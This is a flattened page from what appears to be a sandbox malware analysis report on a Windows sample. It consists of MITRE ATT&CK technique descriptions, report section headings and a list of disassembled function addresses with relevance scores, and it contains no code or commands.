Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report yw6At7QnNh

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Function 0040105A, Relevance: 101.9, APIs: 48, Strings: 10, Instructions: 404
windowlibrarystringCOMMON

Function 10001000, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 175
processlibraryloaderCOMMON

Function 00403D2A, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 196
timeCOMMON

Function 00401B0C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75
timeCOMMON

Function 00401C01, Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Function 0040A813, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00403538, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMON

Function 00401EAF, Relevance: 4.5, APIs: 3, Instructions: 49
COMMON

Function 00402AE5, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 00402326, Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 00401FC9, Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Function 004035E9, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMON

Function 004036E4, Relevance: .3, Instructions: 259
COMMONCrypto

Function 004054D8, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 221
COMMON

Function 004048FB, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Function 00404F51, Relevance: 13.7, APIs: 9, Instructions: 177
COMMON

Function 00402D2D, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Function 00402808, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Function 004051A0, Relevance: 9.1, APIs: 6, Instructions: 117
COMMON

Function 0040293A, Relevance: 7.6, APIs: 5, Instructions: 143
COMMON

Function 004078FE, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53
COMMON

Function 0040A925, Relevance: 6.2, APIs: 4, Instructions: 174
fileCOMMON

Function 00409C8D, Relevance: 6.1, APIs: 4, Instructions: 139
fileCOMMON

Function 0040835F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 108
COMMON

Function 00405693, Relevance: 6.1, APIs: 4, Instructions: 67
COMMON

Function 004045EE, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Function 004053D3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Function 00401282, Relevance: 91.4, APIs: 46, Strings: 6, Instructions: 426
encryptionfilewindowCOMMON

Function 00401046, Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 131
libraryloaderinjectionCOMMON

Function 00401046, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 131
injectionthreadprocessCOMMON

Function 0040258C, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Function 0040258C, Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Function 004018F0, Relevance: 31.8, APIs: 11, Strings: 7, Instructions: 338
stringfileCOMMON

Function 004011C7, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69
fileCOMMON

Function 0040202B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
stringCOMMON

Function 00401000, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Function 00401780, Relevance: 7.6, APIs: 5, Instructions: 147
COMMON

Function 00402085, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35
COMMON

Function 00402257, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28
stringCOMMON

Function 0040216C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
COMMON

Function 004021C9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Function 00402113, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Function 004022B1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Function 00412D30, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 229
libraryloadermemoryCOMMON

Function 0040F7B1, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Function 00410765, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre